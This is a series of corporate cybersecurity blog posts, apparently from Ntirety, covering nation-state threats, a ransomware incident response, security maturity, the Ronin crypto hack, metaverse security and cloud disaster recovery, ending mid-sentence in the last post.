Citing cyberthreats: Why we should be worried Complacency is not an option when it comes to cybersecurity. Ntirety CEO Emil Sayegh highlights prominent cyberthreats we are facing today in the following piece. Citing cyberthreats: Why we should be worried In the wake of global conflicts, significant concerns about the security of critical domestic cyber operations have dominated the news. Yet, despite all the urgent alerts and notices, after several weeks of escalated scenarios of aggression, it seems the “big one” hasn’t quite hit. On one hand, our power is still on, our water still flows, and our kids can still walk over to the campus ATM and check their balances. Have our adversaries been holding back? Or is something else happening? Threat activity levels are higher than ever, and it is more likely that cyber chaos is lying in wait. Remember the peace of the Western Front — this is the time to worry the most. There is little debate that the primary channel for conflicts in the world today is rooted in offensive cyber capabilities. In recent years, attacks from nation-states and state-sponsored groups have surged and include corporate espionage, ransomware schemes, supply chain software breaches, fundraising for terrorist activities, and more. At times it seems that cybersecurity is a cat and mouse epic battle. The U.S. is The Target Let’s be clear; it is not just Russia. Even the slightest indication of undermining security is an opportunity for adversaries and foes. China, Iran, North Korea, and even other actors that claim to be technically our allies will not let an opportunity for technological chaos go to waste. This is our modern Roman arena, and we are not viewed as the lions — we are viewed as the bait, and almost everybody is coming at us. One simple fact of these threats is that a history of successful attacks begets continued attacks. Attack vectors, techniques, and tools are shared in private corners of the web. Successful campaigns also create digital wealth-based cryptocurrency schemes that can wage war, sponsor terrorist groups, and spawn new attacks and new attackers. Russian Capability Russian offensive cyber operations are highly advanced, and we have seen how many experts have tracked the SolarWinds attack of 2020 to suspected Russian sources. This incident was a sophisticated infiltration of a major software supplier, and the discovery of this incident affected thousands of clients. Operations at that scale take time — incorporating full-cycle targeting, social engineering, payload, and surveillance over the course of many months. From the beginning of the war in Ukraine, cyberattacks were first. A prelude to the land attack, these operations destructively took out government agencies, banking facilities, and other critical offices. These were official military actions, but Russia also wields a hidden force of citizens that will see cyber hacking as a form of patriotism and survival as the world continues to pressure economic sanctions upon the country. Attacks could persist for years beyond the cessation of violence. Attack Signals Not Stopping The first quarter of this year is behind us, and we are already seeing high activity in the number of novel methods emerge as well as a heightened and accelerated scale of cyber threat activities across the board. The company I lead has collected an 800% increase in threat activities since the war first started, and it is not abating in any sense of the word. We continue to work with high-level government agencies on a frequent basis to help protect the ecosystem of companies within our client base and beyond. We have the Okta situation, new Android malware, reports of suspected Russian and Chinese capabilities to defeat two-factor authentications, and specific failure incidents, such as the report of a major storage provider going through the permanent loss of customer data. If it isn’t clear already, it one day will be — flaws and human interaction can weaken technology, but technology combined with the commitment to thorough security practices can close significant gaps. There is definitive proof that global criminal and perhaps intelligence syndicates are driving this increased activity and the day of the lone hacker is history. Such is a global cyberwar. Companies cannot withstand this escalating onslaught alone. We must take up arms to protect what is ours. This is an invasion of an entirely different kind, and we must protect the homeland in the cloud, on our keyboards, our television, and mobile devices. Preparation and Targets We have so much to protect. First, our military and economic foundation are highly dependent on digital terrestrial and satellite technologies. The protection of the backbone is critical, and these are primary targets. However, the frontlines in this battle are everywhere we go, everywhere we live, and so right away and urgently, our national base of cyber readiness must get up to speed on security matters. Only a comprehensive security strategy will solve this once and for all, but until then, we can steel ourselves from this persistent wave of threats with basic actions: Lockdown networks and systems Implement tested and validated backups Implement Multi-Factor Authentication Patch systems and software Turn on monitoring and alerting (everywhere) On a personal level, pay attention to your passwords. Change them often and make them complex. Implement multi-factor everywhere possible. Keep aware of phishing attempts, malicious links, and every form of cybersecurity responsibility you bear for yourself and the companies you work for. It is the natural order of things that big-name companies are going to hold a higher target value. Russia, like many other nations that wield cyber threat operations, is in a position where it can completely rely on symbolic victories in its cyber attack campaigns. You can count Coca-Cola, Exxon/Mobil, and even Tesla as organizations that are probably on heightened alert due to their very public business decisions launched in response to Russia’s attack. The Silver Lining Industry awareness of these threats has improved, and the fact that we have survived this long ties back to the hardening throughout the industry following two years of pandemic-driven challenges. The fires of that digital chaos and the improved response are positive historical touchstones. We will find that only a complete lifecycle of comprehensive security can protect what is truly essential. Eventually, the Russian crisis on the ground will pass, but another crisis is looming. Silent digital attacks are a prelude to greater actions, and the stillness is a false sign of security. Russia, China, and other global adversaries are stacked up for a global confrontation, hoping that the weakest target may precipitate our fall. Check out this piece, originally published in Security Magazine, here and follow me on LinkedIn.
Anatomy of a Comprehensive Security Response The frontlines of current cyber threat conditions are an interesting combination of rogue threat actors, state-sponsored groups, and Advanced Persistent Threats (APTs). Their intrusions are characterized by stealth, patience, and slow burn endeavors that are well-funded towards their missions. Namely, these threats are focused on evading detection, reconnaissance, and weaponization in a specialized sequence of escalated changes. Even with multiple layers of technical protection, activities still occur on the most privileged networks. This is an account of how a recent incident in a protected environment was uncovered through diligence and forensic review. If you could visualize a successful cyberattack in review, you would see that the journey is a lot like skipping across stones in a river. Here, we are going to dissect such an attack. The object of cybersecurity protections is to review every stone and successfully stop attacks at every possible point. Uncovering threats can rely on automated detection, artificial intelligence, and alerting to varying degrees. However, information uncovered from these scenarios requires analysis and a threat disposition by actual trained and qualified human beings. Anatomy of the Incident Let us dissect an actual security incident, so we can gain an appreciation of what it takes to mitigate these millions of incidents that happen every day. In the pre-dawn hours of a recent morning, the Ntirety Security Operations Center (SOC) received the first of series of behavioral threat alerts for an endpoint system within a client’s environment. The alert triggered a disposition of a potential network ransom event. An immediate investigation into this system was launched where it was discovered that a portion of the files on the system were encrypted. The investigation further showed that the operating system was functional, with no observable impact. Tier 2 SOC personnel initiated an immediate network containment action to isolate the threat and prevent any possible further lateral movement. Tier 2 SOC personnel continued to scan logs and immediate network connections for signs of further propagation. As the investigation continued, these findings were negative. The SOC initiated a Root Cause Analysis and determined that the initial Point of Entry for this ransomware attack initiated from an unpatched, externally facing server that DID NOT have standard security products installed This server was scheduled for decommissioning. Further, an administrator account for this system had been exploited and had been using a weak, 8-character password that had no history of updates. The affected server was completely compromised, with evidence of complete system encryption. A ransomware note and additional tracking evidence showed the attack was most likely Crylock ransomware, a new variant of Cryakl ransomware. Further investigation uncovered that the attacker(s) were able to log in and install software to maintain remote persistence on the server. System and Security event logs were unable to be recovered, indicating the logs were scrubbed. With the successful compromise in place, the attack attempted to escalate, moving laterally to the endpoint system where our detection tools were able to catch it before any further damage could be done. As an epilogue, the customer received guidance and recommendations towards decommissioning the server as soon as possible, wiping and imaging the affected workstation, network isolation, strong password enforcement practices, and installation of our advanced security tools throughout all systems in their environment. The Comprehensive Response Client environments have all kinds of interesting facets to them that can affect overall security. Sometimes there is a bit of baggage, such as a legacy operating system or application that has no available updates or is tied down to legacy by means of licensing, contract, or a functional gap. That legacy OS was the first problem. Missing security tools were the next issue. From there, we have an unpatched public-facing system, weak and unmanaged privileged passwords, and an open network hop that allowed the attempt to laterally propagate. You can call that an unfortunate mix of vulnerabilities that could have led to a major problem. However, comprehensive practices came through in the detection of anomalous events at the first point possible. Our SOC sprang into action, according to plans, and we were able to fully ascertain this situation and prevent any further incidents. You can see how one unprotected system the potential for significant impact has, but by layering detection and response throughout the environment, we can mitigate the unknown. The goals of the Ntirety SOC and application of comprehensive security principles have common targets. We are focused on minimizing the impact of incidents and breaches on our client organizations. To minimize impact, we are focused on responding to incidents quickly and reducing the time it takes to detect and enact our responses. By effectively remediating security conditions and maintaining security baselines throughout our client environments, we work towards preventing major incidents from occurring. Detection, analysis, investigation, and remediation are some of the milestone capabilities of our comprehensive defensive systems. In the current and future climate of threat conditions, this is the best available path to uncovering the unknown, to reveal hidden threats and adversarial activities, and to identify attacks before they scale.
6 Reasons Why Entrepreneurs Should Take Security Seriously Being an entrepreneur involves some serious hustle in order to make a dream a reality. While it can be tempting to handle everything on your own, cybersecurity requires teamwork. Read this piece from Ntirety CEO Emil Sayegh, originally published in Forbes, to learn more about why cybersecurity should always be a part of an entrepreneur’s strategy. 6 Reasons Why Entrepreneurs Should Take Security Seriously Of all the rules and advice available about running your own business, the best pertains to what mistakes to avoid. At the top of the list of mistakes to avoid as an entrepreneur, you should not do everything yourself. By default, when an individual chooses to do something, they are choosing not to do something else. Yet despite that simplicity, the inclination to do it all in entrepreneur mode is tempting. We want to know every brick of our business and we are willing to ascribe to the icon of hard work and high rewards. The reality is, there is too much on the line and you could be doing other things that you are much better at. It’s a powerful choice that separates leaders from the rest of the pack. In his book Good To Great, Jim Collins calls it level V leadership, a level we all aspire to be at. Choosing what your organization does and does not do is one of the most critical leadership tasks imaginable. This choice applies to our most precious digital assets as well. Information needs to get where it needs to get in a way that is safe. You are not an expert at everything in technology even if you are a technologist at heart. If you try, you end up doing less than you could have done on a much more valuable task. Once you can afford it, hiring experts has tremendous advantages, especially when you regain time and opportunities in doing so. When it comes to IT security, however, you just can’t face these challenges alone. Cybersecurity is not a finish line initiative where you can roll out a tool of some sort and call it a day. The threats are ever-changing and escalating, meaning that protecting your business means keeping a continual watch on your assets and you must never let your guard down towards the ever-evolving vulnerabilities. The risks are just too great to “roll your own.” These are the top reasons why, as an entrepreneur, your IT security should be taken seriously. Impossible Task: Across the globe, more than 30,000 websites are hacked daily. A new attack happens somewhere every 39 seconds. More than 300,000 new pieces of malware are created each day. DDoS attacks, malicious apps, phishing, zero-day attacks, and other security concerns threaten every business, even the small ones. Your adversaries are not individuals but nation states, criminal organizations, and hive-minded hackers. No entrepreneur can do this alone and just because an incident has not happened to you, it does not make you immune. Reputation: Nobody is immune to the damage of reputation that comes in the wake of a cyber incident. Consider the value and reputation loss for companies like Solar Winds, FireEye, and others, and the association with their founders, executives, and company boards. Financial Losses: An incident can wreck your finances for good. Between recovery efforts, penalties, and loss of income, a cyber incident can affect a small company’s bottom line significantly. A 2017 Ponemon Institute study put the average cost for small businesses at $500,000 per incident. This calculation only scratches the surface of legal costs, compliance penalties for HIPAA, GDPR, lost revenue due to downtime, etc. Losing the Board and Investors: The Board of Directors and investors have a stake in the sanctity of the business. There is nothing like a cybersecurity incident and a chain of business ownership crisis to put one at odds with these critical business advocates. The perceived savings of executing your own security is simply not worth it. Endanger Employees: Taking on security alone can endanger your employees, who are your most important asset, through the theft of employee data, including sensitive HR files, dates of birth, financial information, and more. Financial Theft: Cyber thieves, in many manifestations, are out there. Whether it’s a lone hacker, a team of criminals, or a nation-state organization, there are high values placed on the extraction of financial data and the methods being used are crafty, escalating, and unpredictable. At the risk of repetition, understand that entrepreneurs know their businesses, but they are not experts at everything. When the likes of security giants like FireEye fall to modern, sophisticated cyberattacks as we’ve seen in recent news, you should get a sense of how critical it is to not take on the challenge of cybersecurity alone. Focus on the things you do best, and stop doing the things you shouldn’t be. Check out this piece, originally published in Forbes, here and follow me on LinkedIn.
Why Security Maturity is Necessary for Your Business A security maturity model is a set of characteristics that represent an organization’s security progression and capabilities. According to CISOSHARE, Key Processing Areas (KPAs) in a security maturity model are practices that help improve a security infrastructure. These KPAs include: Commitment to perform Ability to perform Activities performed Measurement and analysis of the results Verifying the implementation of processes Levels of security maturity range from 1 to 5, with the lowest level of security maturity being one and the highest level of security maturity being five. Various industries lie within these levels, depending on their security needs. The retail industry typically falls under Levels 2 or 3, manufacturing falls between 3 to 5, while Fintech and Healthcare are between levels 4 and 5 due to the high levels of compliance needed in these industries. Ntirety details these levels of security maturity by detection, response, and recovery times: Level 1 (Vulnerable) Time to Detect: Weeks/months Time to Respond: Weeks Time to Recovery: unknowable Recovery Point: unknowable Compliance: None Level 2 (Aware & Reactive) Time to Detect: Days Time to Respond: Hours Time to Recovery: 1-2 Days Recovery Point: <2 days data loss Compliance: Internal Objectives Level 3 (Effective) Time to Detect: Hours Time to Respond: Minutes Time to Recovery: Hours Recovery Point: <24 hours data loss Compliance: Internal & 3rd party Level 4 (Compliant) Time to Detect: Minutes Time to Respond: Minutes Time to Recovery: Hours Recovery Point: <6 hours data loss Compliance: Internal & 3rd party Level 5 (Optimizing) Time to Detect: Immediate Time to Respond: Immediate Time to Recovery: Immediate Recovery Point: <15 min data loss Compliance: Internal & 3rd party How Ntirety Helps With Security Maturity: With over 20 years of industry experience, Ntirety understands how to support a business’s cybersecurity maturity needs and follow the necessary processes to ensure a smooth transition into IT transformation. For a company to appraise their security maturation with Ntirety, the first step is to have a conversational assessment with our team to determine the security gaps in your business’s cyber infrastructure. Our team can see where your business lies in the security maturity framework and compare it to your goals by answering some questions. Whether it is a particular industry vertical that your company falls under, you are adopting best practices within your IT infrastructure operations, or it is a board mandate, we can help formulate a plan based on your business’s needs. Following an assessment, the Ntirety team can detail how to improve Protection, Recovery, and Assurance. Ntirety’s Guidance Level Agreements (GLAs) can help improve these areas by optimizing availability, security, performance, and costs. Ntirety is committed to securing the “entirety” of your environment through solutions that identify, inventory, and protect the entire target environment. Ntirety’s Compliant Security Framework covers the security process from establishing your security design & objectives through protection, recovery, and assurance of compliance to your security requirements. One mistake we often see with companies is the idea of doing it themselves being a safer option. While resourcing a cybersecurity solution internally may seem more manageable, it can be far more costly and take away from other essential business functions. Here are the top 7 reasons to outsource security: Finding and maintaining a talented SIEM/SOC team is expensive The benefit of trends and detection of other customers Accessing more threat intelligence and state of the art technology Long-term Return on Investment Outsourcing lowers the Risk of conflict of interest between departments Enhancing efficiency to concentrate on your primary business Scalability and flexibility For more details on securing your cyber infrastructure, watch our most recent webinar and schedule an assessment with us today.
Reflecting On The Biggest Crypto Hack Ever Crypto has been a hot topic in recent news. It is relatively new, and security protocols unfortunately are not a high priority. Read this piece from Ntirety CEO, Emil Sayegh originally published in Forbes for more insight. Reflecting On The Biggest Crypto Hack Ever The gaming and crypto worlds have reacted strongly to the news of a major attack that cost one crypto-gaming network upwards of $625 million in assets. The Ronin hack is among the largest crypto heists in history and when the dust settles, the incident may wear that crown alone. The story of this crypto-gaming company holds valid lessons for any organization that is watching. Big Pity for Crypto Crypto is known to the masses as an investment vehicle and to some it is known as a payment source for scams and hacks. Since the beginning, crypto has provided a fascinating ride, but bad actors have inevitably been there all along. Along the way, they ruined some parties. As it stands, the yearly damage for crypto theft and fraud activity worldwide is estimated at over $10 billion per year (and growing). These statistics have created doubt over secured capabilities in the cryptocurrency industry. The Ronin hack holds clues to that uncertain crypto future. Breaking Down the Heist Parties behind the Ronin network reported that validator nodes were subverted using hacked private keys, later leveraged to forge crypto withdrawals. These nodes bridged into a popular game known as “Axie Infinity” – notable for its thorough NFT and crypto monetization. The attackers were able to exploit a back door within a node that was part of the network’s validation protections. With unfettered access, the attackers were able to withdraw 173,600 ether and 25.5 million in USDC. Now, the network must hope that government law enforcement agencies can assist in recovering the stolen assets. Shortcuts and Bad Decisions Sky Mavis, the company behind the Axie Infinity game shared that the attack was possible in part because “immense user load” drove the company to take a self-described “shortcut”. Let’s be clear. This looks like a bad decision that lost sight of the risks. Fixing this specific flaw might be a minor technical affair, but the company must now release a substantial plan that addresses how they technically and philosophically plan to prevent this sort of issue from happening again. In this matter again and again, assets became liabilities, and they were blind to recognizing when that transition occurred. Crypto Liabilities? If risks continue to be treated this way, by anyone, flawed decisions will continue to be a costly problem. The currency at risk can consist of data, crypto, passwords, cash transactions, or anything you would seemingly want to protect and provide. Let us run down specifics on why this is a growing problem for organizations that rely on crypto assets. 1. Cyber liability insurance – It will not cover all your losses. As a matter of fact, the entire cyber insurance industry is being reborn with skyrocketing premiums as it evolves to adapt to heightened threats, ransom amounts, and costs. Activity surge – Billions of crypto assets are stolen each year. Reports indicate that the figure is in the tens of billions and growing. Many parties are engaged in these activities, including North Korea which boasted of its $1.7 B of stolen crypto in 2021. Crypto nature – Crypto happens to be the medium of choice for online crime in part because it is difficult to trace, has no central controlling authority, yet is accessible throughout the world. It is also difficult for law enforcement to recover. The Private Key is GOLD – The possessor of a cryptocurrency account private key wields total and exclusive control. Stealing a private key is like theft of any other traditional piece of info. Scammers will use any means at their disposal to gain access, including Social Engineering, email scams, phishing, and more. Safe Crypto for Us On a personal level, it makes sense to protect your assets using multi-factor authentication (MFA) for sensitive accounts and integrating your notifications correctly. Any major activities surrounding your account should be tracked, and they should alert you. You should also: Protect your secret keys well – this means using strong passwords, combined with MFA. Never share your keys. Avoid public networks and Wi-Fi – Keep your transactions on secured and trusted networks only. Strong, unique passwords – Do not use MFA alone, or combined with weak passwords. Never share it. Keep your crypto secure – Use crypto hardware wallets and never store it on virtual storage. Make sure your apps and exchanges are secure – If you’re using mobile, review and validate every app and crypto exchange you use for security features and reputation. Safe Crypto for Business When protected by constant security measures, cryptocurrency in the enterprise can be a safe and viable business feature that can be implemented in exchanges, consumer and business transactions, in application features, building a marketplace and more. This should not be a surprise, but it turns out that cryptocurrency security is no different than IT security, making it very secure when implemented correctly. At its core, cryptocurrency relies on the blockchain – by design, it features changes and updates that are immutable, publicly distributed, made in multiple copies, and continually validated by means of encrypted key transactions along every step. Blockchain alone is great – but when it comes to business, you need reassurances, and you need awareness. These are fundamental components of comprehensive security, which is the way to go in protecting crypto in the enterprise. Protecting crypto systems in the enterprise depends on ensuring the base platform is fully safe and secure with a comprehensive security approach. After all, not all platforms are equal. You then must make sure that the security state stays that way, assuring that the internals of your crypto foundation are continuously known. If anything goes wrong or changes, you should know immediately, leading you to another critical lynchpin in comprehensive security – monitoring systems. We all expect these sorts of protections to financial transactions. It makes sense for crypto as well, even in a game. Check out this piece, originally published in Forbes, here and follow me on LinkedIn.
The New Normal for Cybersecurity Cybersecurity seems to be making news headlines more and more recently. Hackers are becoming more widespread and more efficient with ransomware attacks up 105% from 2020 to 2021 according to the 2022 Cyber Threat Report. With new virtual realms such as the Metaverse close within our reach, it is crucial that proper protocols are set in place. For a Security Operations Center (SOC), monitoring customer infrastructure activity and quickly mitigating cyber threats is always a top priority, but it is especially important right now as conflict continues between Russia and Ukraine. Current Advanced Persistent Threats (APTs) and destructive malware includes: Disinformation, defacements, Distributed Denial of Service (DDoS) Destructive Wiper Communities WhisperGate HermeticWiper IsaacWiper All of the attacks are initiated to spread propaganda or disrupt normal operations for businesses and individuals. The Destructive Wiper Communities are different destructive malware with the intention to erase computer hardware and delete data and programs having crippling results for these businesses. Following the initial attacks on Ukraine, cyberthreats were heightened globally by over 800%. While the Ntirety SOC team have not seen any targeting of Ntirety customers, we know that this could change at any moment, so we remain vigilant. We are continuing to take steps to enhance cybersecurity postures and increase monitoring for cyber threats. Many data breaches can be tracked back to the tiniest flaws such as a weak or stolen password. As cybercriminal groups grow, it can be difficult for security teams to seal the cracks and fix the bugs fast enough. Protecting your business should be an ongoing effort, as there will always be cyberthreats. It is important to have all the right tools and technologies in place working together. Cyber attackers look for access into endpoints- these endpoints are easily readable, readily available, and easy to access. As remote work has become increasingly more common, these endpoints, which were once located in relatively secure buildings, have moved outside of the four walls of an office. From these endpoints, cybercriminals will steal data and take down critical applications. Malicious attacks can include: Phishing: Users surrender personal information by responding to fake official emails or links to fake websites Malware: “Malicious software” designed to damage or control IT systems (Example: Ransomware) Man-in-the-middle attacks: Hackers insert themselves between your computer and the web server DDoS: “Distributed Denial of Service” A network of computers overload a server with data, shutting it down Internet of Things & Edge Processing: Rogue data thefts; user error (not encrypting) SQL Injection Attack: Corrupts data to make a server divulge potentially sensitive information Cross-Site Scripting: Injects malicious code into a website to target the visitor’s browser Attackers are continuing to evolve their game and crowdsource their efforts. They can find vulnerabilities and exploit weak points within cyber infrastructures. With the help of Ntirety’s SOC your business will have eyes on your cyber infrastructure 24x7x365. For more information watch our recent webinar here and stay tuned for the next blog in this series.
How To Secure A Metaverse The Metaverse is an exciting concept with seemingly endless possibilities. Before enjoying and building this virtual realm, it is critical that we learn from our past and begin with solid privacy and cybersecurity strategies. The following piece from Ntirety CEO Emil Sayegh was originally published in Forbes, and it details security steps that Meta can take. How To Secure A Metaverse Many are wondering about the metaverse and speculating whether it is a hard trend or a soft trend. Questions abound — what it will look like, what will its impact on us be, and how will it interact with our daily lives. At the root of the metaverse concept, physical boundaries will cease to be a limitation of how we engage with others, engage with businesses, and how we consume information. We are opening ourselves up to exposure by novel digital means to a world that will expand without limits. For many, the biggest concerns about the metaverse are the aspects of privacy and cybersecurity. As we embark upon this new age of digital exploration, it is critical to structure this world of virtual engagement with secure concepts, grounded principles, and privacy based technologies. We have a lot of work ahead of us to map out the principles of how the real world interacts with this virtual future. Rebuilding a (Mostly) Secure World The web today has evolved greatly from its earliest days of uncharted freedom and dial-up bound technologies. It didn’t take long, however, before malicious actors, trolls, bots, nation-states, and permutations of digital anomalies changed the game. This landscape of threats and vulnerabilities especially matured as commerce, finance, and general businesses came to adopt web-based technologies. We are going to have to re-envision many things all over again, including things we don’t really think about frequently anymore. Definitions, rights, laws and regulations, and our collective perspectives will all have to be re-engaged quickly as the metaverse arrives and builds out. For example, in the metaverse, legal jurisdictions and boundaries have no practical definition yet. This is a challenge we collectively worked through on cyber and web activities two decades ago, and now we get to do it all over again. The Foundations of Secure Metaverse Very few people like overreach and overregulation by governments. To avoid having regulators come down on the web3 community like a ton of bricks, we must build security considerations into the metaverse from day one. While we must preserve the user experience within the metaverse, we need to simultaneously protect individuals and businesses while also growing usage. It’s a complex balance, and the time to get started on this is now. Consider the fact that the metaverse will be filled with massive troves of data, exchangeable at light speed, and much of it is highly sensitive. Some of it will involve young adults, and even children, as those will be likely early adopters. We must expect that these data will be a target of opportunistic technological and social hacks. The impact on data privacy cannot be underestimated and significant focus must be placed on the tools we have to protect privacy. In non-chronological order we must: Define rights in the metaverse Create and enforce data accountability and data protection responsibilities Create a rating mechanism for age-appropriate access and use Protect against malware Provide awareness of cyber threats Sustain audit capabilities Reinforce identity and validation standards There is enough depth of subject there to write a book (if not several) on these topics. However, the subject of identity is the most intriguing, so let us dive in. Identity and Blockchain Security We must consider how people will be able to identify themselves in the metaverse. We must consider how individuals will come to trust and know that the person or business they are interacting with is really who they say they are. Currently, the strongest anticipated solution will rely on blockchain-based mechanisms to verify identity. While there are obvious opportunities associated with blockchain implementation, it is notable that vulnerabilities are a possibility. Various non-fungible token (NFT) scams have already been noted, and the decentralized nature of the blockchain brings considerable concern that criminally-gained assets such as tokens, identities and transactions will not be recoverable in absence of authoritative controls,. Efforts to implement biometric identification such as fingerprints or facial recognition will also be required. Whatever the ultimate composition of these solutions, they all need to be secure and reliable. A New World of Attacks Before long, metaverse attackers and bots can and will come from anywhere and they will do so around the clock. Naturally, metaverse networks will have to be secure, but we must enforce security by building continuous awareness into these networks. Along with strong passwords, multi-factor authentication, advanced firewalls, and advanced threat detection technologies, we will need to implement visibility and analysis throughout the fabric of the metaverse to detect anomalies, uncover activities, and maintain experiences for all. Data will have to be encrypted and password-protected whether it is in transit or at rest. We will also need to keep watch for phishing, malicious URLs, and similar types of online attacks. Some of these attacks will probably not have a definition yet because they don’t exist yet. In addition to the gallery of hacking, malware, ransomware, and phishing tricks of the trade, entirely new tactics will emerge to focus on the bleeding edge of NFTs, exchanges, and cryptocurrencies. We will need a way to report and distribute the information of how these attacks came to pass. Making a Better Metaverse What we all love about the internet is the ability to get information, make exchanges, and free speech. What we need from the internet is the assurance that it is all as secure as possible, age appropriate, and that we maintain privacy. As the metaverse arrives and evolves, it will require a balanced approach to ensure the best experience for all. The metaverse must capture holistic, principle-focused protections, including awareness, technological methods, and behavior-modeling. The metaverse is part of our collective futures, but it needs to incorporate what we have learned in the past twenty years to not make the same mistakes. The foundational cybersecurity challenges ahead of us are clear, and we must act on those right now to allow the metaverse to prosper. Check out this piece, originally published in Forbes, here and follow me on LinkedIn.
Cybersecurity Challenges in a Nutshell Computer security researcher Dan Farmer once said, “If security were all that mattered, computers would never be turned on, let alone hooked into a network with literally millions of potential intruders.” This is not reality because as individuals and businesses we rely on these devices. The mindset must be changed about where cybersecurity falls on a business priority list. Cyber incidents most often occur because a cybersecurity plan was not set in place prior to an incident. Cybercriminals around the world are deploying ransomware in our cyber infrastructures. after hours or over the weekend so that by the time the effects of it are seen, the damage is done through a phishing attack email or another form of exploitation. It is critical to be proactive when it comes to cybersecurity and already have defenses in place before bad actors reach your cyber infrastructure. Cybercrime has (unfortunately) cost companies trillions of dollars a year according to Cybersecurity Ventures. $6 Trillion USD A YEAR $500 Billion A MONTH $115.4 Billion A WEEK $16.4 Billion A DAY $684.9 Million AN HOUR $11.4 Million A MINUTE Most recently, ransomware groups and criminal enterprises from Russia have been able to operate in their country with no chance of going to jail because it fits with the desires of the country’s leadership. If this leniency on cybercrime remains in countries like this, we cannot rest knowing our cyber infrastructures are not safe. Small to medium businesses are at a high risk for ransomware attacks and often cannot fully recover afterwards. 71% of cyberattacks happen to businesses that have less than 500 employees. Implementing Zero-Trust and having visibility into attacks and resiliency in order to mitigate the damage is critical in moving forward for any business. Frequent patching is another key operational strategy for defending against attacks-a prime example of insufficient patching would be the recent log4j incident. Without proper patching, organizations remain vulnerable to external entities. Additionally, phishing is one of the top ways that cybercriminals enter IT infrastructures, and without proper training, employees and their organizations are vulnerable. Phishing accounts for 90% of data breaches. Through these phishing campaigns, bad actors can steal passwords, install malware to access/control the system, or ransomware to immediately shutdown the business. Weak or stolen passwords make up 81% of breaches according to the Data Breach Investigations Report. This is why it is important to create strong passwords and change them often along with implementing two-factor authentication. Vice President and Global Chief Information Security Officer Stéphane Nappo of Groupe SEB said, “The five most efficient cyber defenders are: Anticipation, Education, Detection, Reaction and Resilience. Do remember: “Cybersecurity is much more than an IT topic.” For more details on how to secure your cyber infrastructure watch our most recent webinar and schedule an assessment with us today.
The Changing Cyber Landscape Cyber-attacks have increased by over 800% since the start of the Russia-Ukraine war from suspected Russian bad actors. Attacks have become so much more frequent and unprecedented and their impacts even more devastating. The Colonial Pipeline ransomware attack in 2021 is a recent example and is the largest publicly disclosed attack against critical infrastructure in the United States. The Colonial Pipeline is the largest refined oil product pipeline in the U.S. and can carry 3 million barrels of fuel per day between Texas and New York. Attackers exploited an exposed password for a VPN account, stole data, and asked for a ransom of $4.4M. The attack was felt across the country through shortages of jet fuel, and fear of a gas shortage caused panic-buying, and a spike in gas prices. Global threats are not only dominating mainstream media headlines but unfortunately our cyber infrastructures as well. 2022 has already seen its fair share of challenges between Covid-19, supply chain issues, natural disasters, and the Russia-Ukraine war. Amidst all these events, cyber incidents were still the top global threat according to the Allianz Risk Barometer 2022. Ransomware attacks cost companies millions each year. The top 5 known ransom payments include: CWT Global AMOUNT PAID: $4.5 MILLION RANSOMWARE: RAGNAR LOCKER> Colonial Pipeline AMOUNT PAID: $4.4 MILLION RANSOMWARE: DARKSIDE Brenntag AMOUNT PAID: $4.4 MILLION RANSOMWARE: DARKSIDE Travelex AMOUNT PAID: $2.3 MILLION RANSOMWARE: SODINOKIBI University of California San Francisco (UCSF) AMOUNT PAID: $1.14 MILLION RANSOMWARE: NETWALKER Most of these vulnerabilities were hacked due to weak passwords or not having many defenses in place and only relying on firewalls. Most of these incidents could have been prevented through a proactive cybersecurity solution such as Identity and Access Management Services. Cyber criminals will often pose as co-workers, friends, or family members for network/password credentials or financial gain-this is called social engineering. The sense of urgency from an authority figure or family member often outwits our sense of realizing this is an out of character request. It often leads to instantly sending money to what seems like a familiar face. The network/password credentials shared provides entry that your typical security hardware and software won’t notice and allows unfettered access to valuable, critical data. Existential Threats As the attacks increase, so do the costs associated with them. The average cost of a data breach is $4.24 million for companies worldwide according to the 2021 Cost of a Data Breach Report. With all the hackers and scammers flooding our cyber infrastructures today, it is more crucial than ever to have the proper defenses in place. The toll on business productivity and financial standing is far too much. Existential Threat: Ransomware Real World Impact: Average cost of a ransomware attack is $732,520 when the ransom was not paid, but doubles to $1,448,458 if the ransom is paid Existential Threat: Downtime Real World Impact: Amazon, Microsoft, Delta, Sony, Nvidia—no company is immune from downtime and the brand damage it inflicts Existential Threat: Compliance Fines Real World Impact: New state compliance requirements are rolling out and the penalties are no slap on the wrist—California Consumer Privacy (CCPA) fines can run up to $7,500 per violation with no cap Existential Threat: Data Loss Real World Impact: Whether from a cyberattack or human error, 40%-60% of SMBs won’t reopen after data loss In addition to these existential threats, enterprises have faced a slew of IT challenges: The average enterprise has 6 different forms of application infrastructure …each of which comes with unique management systems and tools 80% of time is spent managing risk …which leaves little time for IT to create additional value for the business Compliance requirements are evolving in real-time including the addition of state privacy laws. California led the way with CCPA and 38 other states recently implemented privacy laws. IT is expected to do more with less year-after-year managing cross-platforms, and security and compliance of different environments With the ever-increasing threat landscape affecting more businesses and individuals each year, it is understandable companies are seeking out a reliable partner to protect their cyber infrastructure. Ntirety can help your business build a security and compliance solution that meets today’s needs while strengthening your long-term strategy. For more information watch our recent webinar here and stay tuned for the next blog in this series.
When SHTF: Dissecting How Cloud Plays A Role In Disaster Recovery When things go south, we often think of what we could have done to better prepare for the scenario. While many situations are out of our control, there are ways we can be proactive in mitigating cyber threats. This article from Ntirety CEO Emil Sayegh was originally published in Forbes. When SHTF: Dissecting How Cloud Plays A Role In Disaster Recovery SHTF – It’s a messy mental image, but for those of you that know these scenarios, it fits the chaos of the dystopian moments such as what happened at the Port of Beirut in 2020, or during the Texas Snovid Arctic Front in 2021, or more recently when Russia attacked Ukraine. However, the more you know about how to mitigate these sorts of massive disasters, the better prepared and at ease you will be. If disaster preparedness sounds like something that applies to your business (it does), consider identifying where your company is on the spectrum of data use (static vs. dynamic) and whether or not your IT and technology departments have identified the borders between responsibility and liability. Once this information is collected, you can begin to think about what happens when “it” hits the fan so you’re ready if it does. Slow and Costly In the world of IT, traditional disaster recovery is well-established in its redundancies and recovery times. It also includes a variety of concepts and practices that are simply obtuse in today’s dynamic data environments. These approaches often came with limitations on flexibility and scalability. There is also the matter of investment: in order to take advantage of these benefits, there is a high initial investment in terms of hardware and configuration which can be costly for businesses, especially if they’re located across multiple sites. Companies that use traditional disaster recovery host servers at either local or remote locations that require maintenance, licensing, and parallel monitoring. The task of preserving valuable business resources is exponentially more difficult, time consuming, and costly than more modern solutions – especially when it is not unheard of for recovery to take hours or even days to failover under conditions where local services are lost. Enter Cloud Technologies With the advent of cloud technologies, cloud disaster recovery has changed everything by eliminating the need for traditional infrastructure for data recovery purposes. This has significantly reduced downtime in IT departments that use this service as they are able to harness power of 